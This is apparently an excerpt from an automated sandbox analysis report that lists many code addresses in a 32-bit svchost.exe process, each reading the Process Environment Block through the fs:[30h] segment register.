Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]	2_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]	2_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]	2_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]	2_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]	2_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]	2_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]	2_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]	2_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]	2_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]	2_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]	2_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]	2_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]	2_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]	2_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]	2_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]	2_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]	2_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]	2_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]	2_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]	2_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]	2_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]	2_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]	2_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]	2_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]	2_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]	2_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]	2_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]	2_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]	2_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]	2_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]	2_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]	2_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]	2_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]	2_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]	2_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]	2_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]	2_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]	2_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]	2_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]	2_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]	2_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]	2_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]	2_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]	2_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]	2_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]	2_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]	2_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]	2_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]	2_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]	2_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]	2_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]	2_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]	2_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]	2_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]	2_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
